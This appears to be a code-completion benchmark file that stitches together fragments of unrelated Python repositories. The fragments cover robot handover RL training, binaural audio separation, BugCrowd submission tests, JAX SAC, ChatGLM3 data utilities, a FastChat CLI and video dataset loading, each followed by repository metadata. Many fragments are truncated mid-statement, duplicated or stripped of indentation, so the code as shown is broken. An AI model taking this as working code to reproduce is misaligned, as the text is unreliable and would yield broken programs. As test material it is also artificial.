from handover_sim2real.utils import add_sys_path_from_env
from experiments.config import cfg_from_file, save_cfg_to_file
from core.trainer import (
AgentWrapper,
AgentWrapperGPU05,
ReplayMemoryWrapper,
ReplayMemoryWrapperBase,
RolloutAgentWrapperGPU1,
Trainer,
TrainerRemote,
)
from core.utils import get_noise_delta, get_valid_index, rand_sample_joint | 2,315 | # Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the NVIDIA License [see LICENSE for details].
add_sys_path_from_env("GADDPG_DIR")
def parse_args(argv=None):
    """Parse command-line arguments for training.

    Args:
        argv: Optional explicit argument list; defaults to ``sys.argv[1:]``
            (backward compatible with the previous zero-argument call).

    Returns:
        argparse.Namespace holding the parsed options.
    """
    parser = argparse.ArgumentParser(description="Train.")
    parser.add_argument("--cfg-file", help="path to config file")
    parser.add_argument("--seed", default=0, type=int, help="random seed")
    parser.add_argument("--use-grasp-predictor", action="store_true", help="use grasp predictor")
    parser.add_argument("--use-ray", action="store_true", help="use Ray")
    parser.add_argument("--pretrained-dir", help="pretrained model directory")
    parser.add_argument(
        "opts",
        nargs=argparse.REMAINDER,
        help=(
            """modify config options at the end of the command; use space-separated """
            """"PATH.KEY VALUE" pairs; see handover_sim2real/config.py, """
            """handover-sim/handover/config.py, and easysim/src/easysim/config.py for all options"""
        ),
    )
    args = parser.parse_args(argv)
    return args
class ActorWrapper:
def __init__(
self,
stage,
cfg,
use_ray,
rollout_agent,
expert_buffer,
online_buffer,
actor_seed,
grasp_agent,
grasp_pred_threshold,
):
self._stage = stage
self._cfg = cfg
self._use_ray = use_ray
self._expert_buffer = expert_buffer
self._online_buffer = online_buffer
self._use_grasp_predictor = grasp_agent is not None
self._env = HandoverBenchmarkWrapper(gym.make(self._cfg.ENV.ID, cfg=self._cfg))
| # Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
#
# Licensed under the NVIDIA License [see LICENSE for details].
add_sys_path_from_env("GADDPG_DIR")
def parse_args():
parser = argparse.ArgumentParser(description="Train.")
parser.add_argument("--cfg-file", help="path to config file")
parser.add_argument("--seed", default=0, type=int, help="random seed")
parser.add_argument("--use-grasp-predictor", action="store_true", help="use grasp predictor")
parser.add_argument("--use-ray", action="store_true", help="use Ray")
parser.add_argument("--pretrained-dir", help="pretrained model directory")
parser.add_argument(
"opts",
nargs=argparse.REMAINDER,
help=(
"""modify config options at the end of the command; use space-separated """
""""PATH.KEY VALUE" pairs; see handover_sim2real/config.py, """
"""handover-sim/handover/config.py, and easysim/src/easysim/config.py for all options"""
),
)
args = parser.parse_args()
return args
class ActorWrapper:
def __init__(
self,
stage,
cfg,
use_ray,
rollout_agent,
expert_buffer,
online_buffer,
actor_seed,
grasp_agent,
grasp_pred_threshold,
):
self._stage = stage
self._cfg = cfg
self._use_ray = use_ray
self._expert_buffer = expert_buffer
self._online_buffer = online_buffer
self._use_grasp_predictor = grasp_agent is not None
self._env = HandoverBenchmarkWrapper(gym.make(self._cfg.ENV.ID, cfg=self._cfg))
| self._policy = HandoverSim2RealPolicy( | 1 | 2023-10-26 23:25:13+00:00 | 4k |
vb000/SemanticHearing | src/training/dcc_tf_binaural.py | [
{
"identifier": "mod_pad",
"path": "src/training/dcc_tf.py",
"snippet": "def mod_pad(x, chunk_size, pad):\n # Mod pad the input to perform integer number of\n # inferences\n mod = 0\n if (x.shape[-1] % chunk_size) != 0:\n mod = chunk_size - (x.shape[-1] % chunk_size)\n\n x = F.pad(... | import os
import math
import logging
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torchaudio
from collections import OrderedDict
from typing import Optional
from copy import deepcopy
from torch import Tensor
from torchmetrics.functional import(
scale_invariant_signal_noise_ratio as si_snr,
signal_noise_ratio as snr,
signal_distortion_ratio as sdr,
scale_invariant_signal_distortion_ratio as si_sdr)
from src.training.dcc_tf import mod_pad, MaskNet
from src.helpers.eval_utils import itd_diff, ild_diff | 2,293 | padding=out_buf_len * L, bias=False),
nn.Tanh())
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)['model_state_dict']
# Load all the layers except label_embedding and freeze them
for name, param in self.named_parameters():
if 'label_embedding' not in name:
param.data = state_dict[name]
param.requires_grad = False
def init_buffers(self, batch_size, device):
enc_buf = self.mask_gen.encoder.init_ctx_buf(batch_size, device)
dec_buf = self.mask_gen.decoder.init_ctx_buf(batch_size, device)
out_buf = torch.zeros(batch_size, self.model_dim, self.out_buf_len,
device=device)
return enc_buf, dec_buf, out_buf
def predict(self, x, label, enc_buf, dec_buf, out_buf):
# Generate latent space representation of the input
x = self.in_conv(x)
# Generate label embedding
l = self.label_embedding(label) # [B, label_len] --> [B, channels]
l = l.unsqueeze(1).unsqueeze(-1) # [B, 1, channels, 1]
# Generate mask corresponding to the label
m, enc_buf, dec_buf = self.mask_gen(x, l, enc_buf, dec_buf)
# Apply mask and decode
x = x * m
x = torch.cat((out_buf, x), dim=-1)
out_buf = x[..., -self.out_buf_len:]
x = self.out_conv(x)
return x, enc_buf, dec_buf, out_buf
def forward(self, inputs, init_enc_buf=None, init_dec_buf=None,
init_out_buf=None, pad=True, writer=None, step=None, idx=None):
"""
Extracts the audio corresponding to the `label` in the given
`mixture`. Generates `chunk_size` samples per iteration.
Args:
mixed: [B, n_mics, T]
input audio mixture
label: [B, num_labels]
one hot label
Returns:
out: [B, n_spk, T]
extracted audio with sounds corresponding to the `label`
"""
x, label = inputs['mixture'], inputs['label_vector']
if init_enc_buf is None or init_dec_buf is None or init_out_buf is None:
assert init_enc_buf is None and \
init_dec_buf is None and \
init_out_buf is None, \
"Both buffers have to initialized, or " \
"both of them have to be None."
enc_buf, dec_buf, out_buf = self.init_buffers(
x.shape[0], x.device)
else:
enc_buf, dec_buf, out_buf = \
init_enc_buf, init_dec_buf, init_out_buf
mod = 0
if pad:
pad_size = (self.L, self.L) if self.lookahead else (0, 0)
x, mod = mod_pad(x, chunk_size=self.L, pad=pad_size)
x, enc_buf, dec_buf, out_buf = self.predict(
x, label, enc_buf, dec_buf, out_buf)
# Remove mod padding, if present.
if mod != 0:
x = x[:, :, :-mod]
out = {'x': x}
if init_enc_buf is None:
return out
else:
return out, enc_buf, dec_buf, out_buf
# Define optimizer, loss and metrics
def optimizer(model, data_parallel=False, **kwargs):
params = [p for p in model.parameters() if p.requires_grad]
return optim.Adam(params, **kwargs)
def loss(_output, tgt):
pred = _output['x']
return -0.9 * snr(pred, tgt).mean() - 0.1 * si_snr(pred, tgt).mean()
def metrics(inputs, _output, gt):
""" Function to compute metrics """
mixed = inputs['mixture']
output = _output['x']
metrics = {}
def metric_i(metric, src, pred, tgt):
_vals = []
for s, t, p in zip(src, tgt, pred):
_vals.append(torch.mean((metric(p, t) - metric(s, t))).cpu().item())
return _vals
for m_fn in [snr, si_snr]:
metrics[m_fn.__name__] = metric_i(m_fn,
mixed[:, :gt.shape[1], :],
output,
gt)
return metrics
def test_metrics(inputs, _output, gt):
test_metrics = metrics(inputs, _output, gt)
output = _output['x']
delta_itds, delta_ilds, snrs = [], [], []
for o, g in zip(output, gt):
|
class Net(nn.Module):
def __init__(self, label_len, L=8,
model_dim=512, num_enc_layers=10,
dec_buf_len=100, num_dec_layers=2,
dec_chunk_size=72, out_buf_len=2,
use_pos_enc=True, conditioning="mult", lookahead=True,
pretrained_path=None):
super(Net, self).__init__()
self.L = L
self.out_buf_len = out_buf_len
self.model_dim = model_dim
self.lookahead = lookahead
# Input conv to convert input audio to a latent representation
kernel_size = 3 * L if lookahead else L
self.in_conv = nn.Sequential(
nn.Conv1d(in_channels=2,
out_channels=model_dim, kernel_size=kernel_size, stride=L,
padding=0, bias=False),
nn.ReLU())
# Label embedding layer
self.label_embedding = nn.Sequential(
nn.Linear(label_len, 512),
nn.LayerNorm(512),
nn.ReLU(),
nn.Linear(512, model_dim),
nn.LayerNorm(model_dim),
nn.ReLU())
# Mask generator
self.mask_gen = MaskNet(
model_dim=model_dim, num_enc_layers=num_enc_layers,
dec_buf_len=dec_buf_len,
dec_chunk_size=dec_chunk_size, num_dec_layers=num_dec_layers,
use_pos_enc=use_pos_enc, conditioning=conditioning)
# Output conv layer
self.out_conv = nn.Sequential(
nn.ConvTranspose1d(
in_channels=model_dim, out_channels=2,
kernel_size=(out_buf_len + 1) * L,
stride=L,
padding=out_buf_len * L, bias=False),
nn.Tanh())
if pretrained_path is not None:
state_dict = torch.load(pretrained_path)['model_state_dict']
# Load all the layers except label_embedding and freeze them
for name, param in self.named_parameters():
if 'label_embedding' not in name:
param.data = state_dict[name]
param.requires_grad = False
def init_buffers(self, batch_size, device):
enc_buf = self.mask_gen.encoder.init_ctx_buf(batch_size, device)
dec_buf = self.mask_gen.decoder.init_ctx_buf(batch_size, device)
out_buf = torch.zeros(batch_size, self.model_dim, self.out_buf_len,
device=device)
return enc_buf, dec_buf, out_buf
def predict(self, x, label, enc_buf, dec_buf, out_buf):
# Generate latent space representation of the input
x = self.in_conv(x)
# Generate label embedding
l = self.label_embedding(label) # [B, label_len] --> [B, channels]
l = l.unsqueeze(1).unsqueeze(-1) # [B, 1, channels, 1]
# Generate mask corresponding to the label
m, enc_buf, dec_buf = self.mask_gen(x, l, enc_buf, dec_buf)
# Apply mask and decode
x = x * m
x = torch.cat((out_buf, x), dim=-1)
out_buf = x[..., -self.out_buf_len:]
x = self.out_conv(x)
return x, enc_buf, dec_buf, out_buf
def forward(self, inputs, init_enc_buf=None, init_dec_buf=None,
init_out_buf=None, pad=True, writer=None, step=None, idx=None):
"""
Extracts the audio corresponding to the `label` in the given
`mixture`. Generates `chunk_size` samples per iteration.
Args:
mixed: [B, n_mics, T]
input audio mixture
label: [B, num_labels]
one hot label
Returns:
out: [B, n_spk, T]
extracted audio with sounds corresponding to the `label`
"""
x, label = inputs['mixture'], inputs['label_vector']
if init_enc_buf is None or init_dec_buf is None or init_out_buf is None:
assert init_enc_buf is None and \
init_dec_buf is None and \
init_out_buf is None, \
"Both buffers have to initialized, or " \
"both of them have to be None."
enc_buf, dec_buf, out_buf = self.init_buffers(
x.shape[0], x.device)
else:
enc_buf, dec_buf, out_buf = \
init_enc_buf, init_dec_buf, init_out_buf
mod = 0
if pad:
pad_size = (self.L, self.L) if self.lookahead else (0, 0)
x, mod = mod_pad(x, chunk_size=self.L, pad=pad_size)
x, enc_buf, dec_buf, out_buf = self.predict(
x, label, enc_buf, dec_buf, out_buf)
# Remove mod padding, if present.
if mod != 0:
x = x[:, :, :-mod]
out = {'x': x}
if init_enc_buf is None:
return out
else:
return out, enc_buf, dec_buf, out_buf
# Define optimizer, loss and metrics
def optimizer(model, data_parallel=False, **kwargs):
params = [p for p in model.parameters() if p.requires_grad]
return optim.Adam(params, **kwargs)
def loss(_output, tgt):
pred = _output['x']
return -0.9 * snr(pred, tgt).mean() - 0.1 * si_snr(pred, tgt).mean()
def metrics(inputs, _output, gt):
""" Function to compute metrics """
mixed = inputs['mixture']
output = _output['x']
metrics = {}
def metric_i(metric, src, pred, tgt):
_vals = []
for s, t, p in zip(src, tgt, pred):
_vals.append(torch.mean((metric(p, t) - metric(s, t))).cpu().item())
return _vals
for m_fn in [snr, si_snr]:
metrics[m_fn.__name__] = metric_i(m_fn,
mixed[:, :gt.shape[1], :],
output,
gt)
return metrics
def test_metrics(inputs, _output, gt):
test_metrics = metrics(inputs, _output, gt)
output = _output['x']
delta_itds, delta_ilds, snrs = [], [], []
for o, g in zip(output, gt): | delta_itds.append(itd_diff(o.cpu(), g.cpu(), sr=44100)) | 2 | 2023-10-30 05:36:07+00:00 | 4k |
openai/bugbounty-gpt | tests/test_comment_handling.py | [
{
"identifier": "BugCrowdSubmission",
"path": "bugbounty_gpt/handlers/submission_handler.py",
"snippet": "class BugCrowdSubmission:\n def __init__(self, submission_id, classification, reasoning):\n \"\"\"\n Initializes a BugCrowdSubmission object.\n\n :param submission_id: ID of ... | from bugbounty_gpt.handlers.submission_handler import BugCrowdSubmission
from bugbounty_gpt.handlers.bugcrowd_api import BugCrowdAPI
from unittest.mock import patch, AsyncMock
import logging
import pytest | 2,664 |
def test_prepare_comment_data():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
expected_data = {
"data": {
"type": "comment",
"attributes": {
"body": comment_body,
"visibility_scope": "everyone"
},
"relationships": {
"submission": {
"data": {
"id": "submission_id",
"type": "submission"
}
}
}
}
}
assert submission._prepare_comment_data(comment_body) == expected_data
@pytest.mark.asyncio
async def test_create_comment_success():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
|
def test_prepare_comment_data():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
expected_data = {
"data": {
"type": "comment",
"attributes": {
"body": comment_body,
"visibility_scope": "everyone"
},
"relationships": {
"submission": {
"data": {
"id": "submission_id",
"type": "submission"
}
}
}
}
}
assert submission._prepare_comment_data(comment_body) == expected_data
@pytest.mark.asyncio
async def test_create_comment_success():
submission = BugCrowdSubmission("submission_id", None, None)
comment_body = "Test comment"
| with patch.object(BugCrowdAPI, 'create_comment', new_callable=AsyncMock) as mock_create_comment: | 1 | 2023-10-27 22:41:24+00:00 | 4k |
LeapLabTHU/FamO2O | jax_cql/JaxCQL/sac.py | [
{
"identifier": "next_rng",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def next_rng(*args, **kwargs):\n global jax_utils_rng\n return jax_utils_rng(*args, **kwargs)"
},
{
"identifier": "value_and_multi_grad",
"path": "jax_cql/JaxCQL/jax_utils.py",
"snippet": "def value_and_... | from collections import OrderedDict
from copy import deepcopy
from functools import partial
from ml_collections import ConfigDict
from flax.training.train_state import TrainState
from .jax_utils import (
next_rng, value_and_multi_grad, mse_loss, JaxRNG, wrap_function_with_rng,
collect_jax_metrics
)
from .model import Scalar, update_target_network
import numpy as np
import jax
import jax.numpy as jnp
import flax
import flax.linen as nn
import optax
import distrax | 2,529 | qf2_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf2'] = TrainState.create(
params=qf2_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
self._target_qf_params = deepcopy({'qf1': qf1_params, 'qf2': qf2_params})
model_keys = ['policy', 'qf1', 'qf2']
if self.config.use_automatic_entropy_tuning:
self.log_alpha = Scalar(0.0)
self._train_states['log_alpha'] = TrainState.create(
params=self.log_alpha.init(next_rng()),
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
model_keys.append('log_alpha')
self._model_keys = tuple(model_keys)
self._total_steps = 0
def train(self, batch):
self._total_steps += 1
self._train_states, self._target_qf_params, metrics = self._train_step(
self._train_states, self._target_qf_params, next_rng(), batch
)
return metrics
@partial(jax.jit, static_argnames='self')
def _train_step(self, train_states, target_qf_params, rng, batch):
rng_generator = JaxRNG(rng)
def loss_fn(train_params, rng):
observations = batch['observations']
actions = batch['actions']
rewards = batch['rewards']
next_observations = batch['next_observations']
dones = batch['dones']
loss_collection = {}
@wrap_function_with_rng(rng_generator())
def forward_policy(rng, *args, **kwargs):
return self.policy.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.policy.rng_keys())
)
@wrap_function_with_rng(rng_generator())
def forward_qf(rng, *args, **kwargs):
return self.qf.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.qf.rng_keys())
)
new_actions, log_pi = forward_policy(train_params['policy'], observations)
if self.config.use_automatic_entropy_tuning:
alpha_loss = -self.log_alpha.apply(train_params['log_alpha']) * (log_pi + self.config.target_entropy).mean()
loss_collection['log_alpha'] = alpha_loss
alpha = jnp.exp(self.log_alpha.apply(train_params['log_alpha'])) * self.config.alpha_multiplier
else:
alpha_loss = 0.0
alpha = self.config.alpha_multiplier
""" Policy loss """
q_new_actions = jnp.minimum(
forward_qf(train_params['qf1'], observations, new_actions),
forward_qf(train_params['qf2'], observations, new_actions),
)
policy_loss = (alpha*log_pi - q_new_actions).mean()
loss_collection['policy'] = policy_loss
""" Q function loss """
q1_pred = forward_qf(train_params['qf1'], observations, actions)
q2_pred = forward_qf(train_params['qf2'], observations, actions)
new_next_actions, next_log_pi = forward_policy(train_params['policy'], next_observations)
target_q_values = jnp.minimum(
forward_qf(target_qf_params['qf1'], next_observations, new_next_actions),
forward_qf(target_qf_params['qf2'], next_observations, new_next_actions),
)
if self.config.backup_entropy:
target_q_values = target_q_values - alpha * next_log_pi
q_target = jax.lax.stop_gradient(
rewards + (1. - dones) * self.config.discount * target_q_values
)
qf1_loss = mse_loss(q1_pred, q_target)
qf2_loss = mse_loss(q2_pred, q_target)
loss_collection['qf1'] = qf1_loss
loss_collection['qf2'] = qf2_loss
return tuple(loss_collection[key] for key in self.model_keys), locals()
train_params = {key: train_states[key].params for key in self.model_keys}
(_, aux_values), grads = value_and_multi_grad(loss_fn, len(self.model_keys), has_aux=True)(train_params, rng)
new_train_states = {
key: train_states[key].apply_gradients(grads=grads[i][key])
for i, key in enumerate(self.model_keys)
}
new_target_qf_params = {}
new_target_qf_params['qf1'] = update_target_network(
new_train_states['qf1'].params, target_qf_params['qf1'],
self.config.soft_target_update_rate
)
new_target_qf_params['qf2'] = update_target_network(
new_train_states['qf2'].params, target_qf_params['qf2'],
self.config.soft_target_update_rate
)
|
class SAC(object):
@staticmethod
def get_default_config(updates=None):
config = ConfigDict()
config.discount = 0.99
config.alpha_multiplier = 1.0
config.use_automatic_entropy_tuning = True
config.backup_entropy = False
config.target_entropy = 0.0
config.policy_lr = 3e-4
config.qf_lr = 3e-4
config.optimizer_type = 'adam'
config.soft_target_update_rate = 5e-3
if updates is not None:
config.update(ConfigDict(updates).copy_and_resolve_references())
return config
def __init__(self, config, policy, qf):
self.config = self.get_default_config(config)
self.policy = policy
self.qf = qf
self.observation_dim = policy.observation_dim
self.action_dim = policy.action_dim
self._train_states = {}
optimizer_class = {
'adam': optax.adam,
'sgd': optax.sgd,
}[self.config.optimizer_type]
policy_params = self.policy.init(
next_rng(self.policy.rng_keys()),
jnp.zeros((10, self.observation_dim))
)
self._train_states['policy'] = TrainState.create(
params=policy_params,
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
qf1_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf1'] = TrainState.create(
params=qf1_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
qf2_params = self.qf.init(
next_rng(self.qf.rng_keys()),
jnp.zeros((10, self.observation_dim)),
jnp.zeros((10, self.action_dim))
)
self._train_states['qf2'] = TrainState.create(
params=qf2_params,
tx=optimizer_class(self.config.qf_lr),
apply_fn=None,
)
self._target_qf_params = deepcopy({'qf1': qf1_params, 'qf2': qf2_params})
model_keys = ['policy', 'qf1', 'qf2']
if self.config.use_automatic_entropy_tuning:
self.log_alpha = Scalar(0.0)
self._train_states['log_alpha'] = TrainState.create(
params=self.log_alpha.init(next_rng()),
tx=optimizer_class(self.config.policy_lr),
apply_fn=None
)
model_keys.append('log_alpha')
self._model_keys = tuple(model_keys)
self._total_steps = 0
def train(self, batch):
self._total_steps += 1
self._train_states, self._target_qf_params, metrics = self._train_step(
self._train_states, self._target_qf_params, next_rng(), batch
)
return metrics
@partial(jax.jit, static_argnames='self')
def _train_step(self, train_states, target_qf_params, rng, batch):
rng_generator = JaxRNG(rng)
def loss_fn(train_params, rng):
observations = batch['observations']
actions = batch['actions']
rewards = batch['rewards']
next_observations = batch['next_observations']
dones = batch['dones']
loss_collection = {}
@wrap_function_with_rng(rng_generator())
def forward_policy(rng, *args, **kwargs):
return self.policy.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.policy.rng_keys())
)
@wrap_function_with_rng(rng_generator())
def forward_qf(rng, *args, **kwargs):
return self.qf.apply(
*args, **kwargs,
rngs=JaxRNG(rng)(self.qf.rng_keys())
)
new_actions, log_pi = forward_policy(train_params['policy'], observations)
if self.config.use_automatic_entropy_tuning:
alpha_loss = -self.log_alpha.apply(train_params['log_alpha']) * (log_pi + self.config.target_entropy).mean()
loss_collection['log_alpha'] = alpha_loss
alpha = jnp.exp(self.log_alpha.apply(train_params['log_alpha'])) * self.config.alpha_multiplier
else:
alpha_loss = 0.0
alpha = self.config.alpha_multiplier
""" Policy loss """
q_new_actions = jnp.minimum(
forward_qf(train_params['qf1'], observations, new_actions),
forward_qf(train_params['qf2'], observations, new_actions),
)
policy_loss = (alpha*log_pi - q_new_actions).mean()
loss_collection['policy'] = policy_loss
""" Q function loss """
q1_pred = forward_qf(train_params['qf1'], observations, actions)
q2_pred = forward_qf(train_params['qf2'], observations, actions)
new_next_actions, next_log_pi = forward_policy(train_params['policy'], next_observations)
target_q_values = jnp.minimum(
forward_qf(target_qf_params['qf1'], next_observations, new_next_actions),
forward_qf(target_qf_params['qf2'], next_observations, new_next_actions),
)
if self.config.backup_entropy:
target_q_values = target_q_values - alpha * next_log_pi
q_target = jax.lax.stop_gradient(
rewards + (1. - dones) * self.config.discount * target_q_values
)
qf1_loss = mse_loss(q1_pred, q_target)
qf2_loss = mse_loss(q2_pred, q_target)
loss_collection['qf1'] = qf1_loss
loss_collection['qf2'] = qf2_loss
return tuple(loss_collection[key] for key in self.model_keys), locals()
train_params = {key: train_states[key].params for key in self.model_keys}
(_, aux_values), grads = value_and_multi_grad(loss_fn, len(self.model_keys), has_aux=True)(train_params, rng)
new_train_states = {
key: train_states[key].apply_gradients(grads=grads[i][key])
for i, key in enumerate(self.model_keys)
}
new_target_qf_params = {}
new_target_qf_params['qf1'] = update_target_network(
new_train_states['qf1'].params, target_qf_params['qf1'],
self.config.soft_target_update_rate
)
new_target_qf_params['qf2'] = update_target_network(
new_train_states['qf2'].params, target_qf_params['qf2'],
self.config.soft_target_update_rate
)
| metrics = collect_jax_metrics( | 5 | 2023-10-25 11:53:25+00:00 | 4k |
ssbuild/chatglm3_finetuning | data_utils.py | [
{
"identifier": "DataStrategy",
"path": "data_processer.py",
"snippet": "class DataStrategy(Enum):\r\n truncation = 1\r\n siding = 2\r"
},
{
"identifier": "TokenIdsMaker",
"path": "data_processer.py",
"snippet": "class TokenIdsMaker:\r\n def __init__(self,tokenizer: ChatGLMToken... | import copy
import glob
import json
import os
import typing
import numpy as np
import torch
from functools import cache
from deep_training.data_helper import DataHelper, ModelArguments, TrainingArguments, DataArguments, TrainingArgumentsHF, \
TrainingArgumentsCL, TrainingArgumentsAC
from fastdatasets.record import load_dataset as Loader, RECORD, WriterObject, gfile
from tqdm import tqdm
from transformers import HfArgumentParser
from data_processer import DataStrategy, TokenIdsMaker
from aigc_zoo.model_zoo.chatglm3.llm_model import ChatGLMTokenizer,PetlArguments,ChatGLMConfig
from config import *
| 2,312 | # @Time : 2023/1/22 16:22
# @Author : tk
# @FileName: data_utils.py
assert train_info_args['max_seq_length'] > 20
data_conf = {
'strategy': DataStrategy.truncation, # 数据策略选项
DataStrategy.truncation: {
'sup': True, # 是否监督训练
},
DataStrategy.siding: {
'sliding_size': train_info_args['max_seq_length'] // 3 * 2, #prompt滑动窗口大小
'sup': True, # 是否监督训练
"src_max_length": train_info_args['max_seq_length'] - 10,
"dst_max_length": None,
},
}
def preprocess(text):
#text = text.replace("\n", "\\n").replace("\t", "\\t")
return text
def postprocess(text):
# return text.replace("\\n", "\n").replace("\\t", "\t")
return text
def build_masks_and_position_ids_glm(batch_input_ids, ctxlens):
max_len = batch_input_ids.size(1)
batch_position_ids, batch_attention_mask = [], []
for input_ids,ctxlen in zip(batch_input_ids,ctxlens):
position_ids = list(range(0,max_len))
assert ctxlen <= max_len
attention_mask = [1] * ctxlen + [0] * (max_len - ctxlen)
batch_position_ids.append(torch.tensor(position_ids,dtype=torch.long))
batch_attention_mask.append(torch.tensor(attention_mask,dtype=torch.long))
batch_attention_mask = torch.stack(batch_attention_mask, dim=0)
batch_position_ids = torch.stack(batch_position_ids, dim=0)
return batch_attention_mask,batch_position_ids
class NN_DataHelper(DataHelper):
index = 1
tokens_ids_maker = None
def on_data_ready(self):
self.index = -1
# 切分词
def on_data_process(self, data: typing.Any, mode: str):
self.index += 1
tokenizer: ChatGLMTokenizer = self.tokenizer # noqa
config: ChatGLMConfig = self.config # noqa
max_seq_length = self.max_seq_length_dict[mode]
if self.tokens_ids_maker is None:
| # @Time : 2023/1/22 16:22
# @Author : tk
# @FileName: data_utils.py
assert train_info_args['max_seq_length'] > 20
data_conf = {
'strategy': DataStrategy.truncation, # 数据策略选项
DataStrategy.truncation: {
'sup': True, # 是否监督训练
},
DataStrategy.siding: {
'sliding_size': train_info_args['max_seq_length'] // 3 * 2, #prompt滑动窗口大小
'sup': True, # 是否监督训练
"src_max_length": train_info_args['max_seq_length'] - 10,
"dst_max_length": None,
},
}
def preprocess(text):
#text = text.replace("\n", "\\n").replace("\t", "\\t")
return text
def postprocess(text):
# return text.replace("\\n", "\n").replace("\\t", "\t")
return text
def build_masks_and_position_ids_glm(batch_input_ids, ctxlens):
max_len = batch_input_ids.size(1)
batch_position_ids, batch_attention_mask = [], []
for input_ids,ctxlen in zip(batch_input_ids,ctxlens):
position_ids = list(range(0,max_len))
assert ctxlen <= max_len
attention_mask = [1] * ctxlen + [0] * (max_len - ctxlen)
batch_position_ids.append(torch.tensor(position_ids,dtype=torch.long))
batch_attention_mask.append(torch.tensor(attention_mask,dtype=torch.long))
batch_attention_mask = torch.stack(batch_attention_mask, dim=0)
batch_position_ids = torch.stack(batch_position_ids, dim=0)
return batch_attention_mask,batch_position_ids
class NN_DataHelper(DataHelper):
index = 1
tokens_ids_maker = None
def on_data_ready(self):
self.index = -1
# 切分词
def on_data_process(self, data: typing.Any, mode: str):
self.index += 1
tokenizer: ChatGLMTokenizer = self.tokenizer # noqa
config: ChatGLMConfig = self.config # noqa
max_seq_length = self.max_seq_length_dict[mode]
if self.tokens_ids_maker is None:
| self.tokens_ids_maker = TokenIdsMaker(tokenizer=tokenizer,config=config)
| 1 | 2023-10-27 09:15:00+00:00 | 4k |
DAMO-NLP-SG/CLEX | serve/cli.py | [
{
"identifier": "ChatIO",
"path": "serve/inference.py",
"snippet": "class ChatIO(abc.ABC):\n @abc.abstractmethod\n def prompt_for_input(self, role: str) -> str:\n \"\"\"Prompt for input from a role.\"\"\"\n\n @abc.abstractmethod\n def prompt_for_output(self, role: str):\n \"\"\... | import argparse
import os
import re
import sys
import torch
from prompt_toolkit import PromptSession
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.key_binding import KeyBindings
from rich.console import Console
from rich.live import Live
from rich.markdown import Markdown
from fastchat.model.model_adapter import add_model_args
from fastchat.modules.awq import AWQConfig
from fastchat.modules.exllama import ExllamaConfig
from fastchat.modules.gptq import GptqConfig
from serve.inference import ChatIO, chat_loop
from fastchat.utils import str_to_torch_dtype | 2,173 | """
Chat with a model with command line interface.
Usage:
python3 -m fastchat.serve.cli --model lmsys/vicuna-7b-v1.3
python3 -m fastchat.serve.cli --model lmsys/fastchat-t5-3b-v1.0
Other commands:
- Type "!!exit" or an empty line to exit.
- Type "!!reset" to start a new conversation.
- Type "!!remove" to remove the last prompt.
- Type "!!regen" to regenerate the last message.
- Type "!!save <filename>" to save the conversation history to a json file.
- Type "!!load <filename>" to load a conversation history from a json file.
"""
| """
Chat with a model with command line interface.
Usage:
python3 -m fastchat.serve.cli --model lmsys/vicuna-7b-v1.3
python3 -m fastchat.serve.cli --model lmsys/fastchat-t5-3b-v1.0
Other commands:
- Type "!!exit" or an empty line to exit.
- Type "!!reset" to start a new conversation.
- Type "!!remove" to remove the last prompt.
- Type "!!regen" to regenerate the last message.
- Type "!!save <filename>" to save the conversation history to a json file.
- Type "!!load <filename>" to load a conversation history from a json file.
"""
| class SimpleChatIO(ChatIO): | 0 | 2023-10-25 05:30:25+00:00 | 4k |
RenShuhuai-Andy/TESTA | data/video_dataset.py | [
{
"identifier": "pre_caption",
"path": "data/utils.py",
"snippet": "def pre_caption(caption, max_words=50):\n caption = re.sub(\n r\"([!\\\"()*#~])\", #r\"([!\\\"()*#:;~])\" #r\"([.!\\\"()*#:;~])\",\n ' ',\n caption.lower(),\n )\n caption = re.sub(\n r\"\\s{2,}\",\n... | import logging
import copy
import math
import pickle
import torch
import numpy as np
import random
import decord
import json
import os
import random
import pandas as pd
import collections
from torch.utils.data import Dataset
from torchvision.datasets.utils import download_url
from PIL import Image
from decord import VideoReader
from data.utils import pre_caption, pre_question
from .randaugment import TemporalConsistentRandomAugment | 2,348 |
def load_video_from_path_decord(video_path, frm_sampling_strategy, num_frm, height=None, width=None, start_time=None,
end_time=None, fps=-1):
try:
if not height or not width:
vr = VideoReader(video_path)
else:
vr = VideoReader(video_path, width=width, height=height)
vlen = len(vr)
if start_time or end_time:
assert fps > 0, 'must provide video fps if specifying start and end time.'
start_idx = min(int(start_time * fps), vlen)
end_idx = min(int(end_time * fps), vlen)
else:
start_idx, end_idx = 0, vlen
if frm_sampling_strategy == 'uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm, dtype=int)
elif frm_sampling_strategy == 'nlvl_uniform':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
elif frm_sampling_strategy == 'nlvl_rand':
frame_indices = np.arange(start_idx, end_idx, vlen / num_frm).astype(int)
# generate some random perturbations
strides = [frame_indices[i] - frame_indices[i - 1] for i in range(1, len(frame_indices))] + [vlen - frame_indices[-1]]
pertube = np.array([np.random.randint(0, stride) for stride in strides])
frame_indices = frame_indices + pertube
elif frm_sampling_strategy == 'rand':
frame_indices = sorted(random.sample(range(vlen), num_frm))
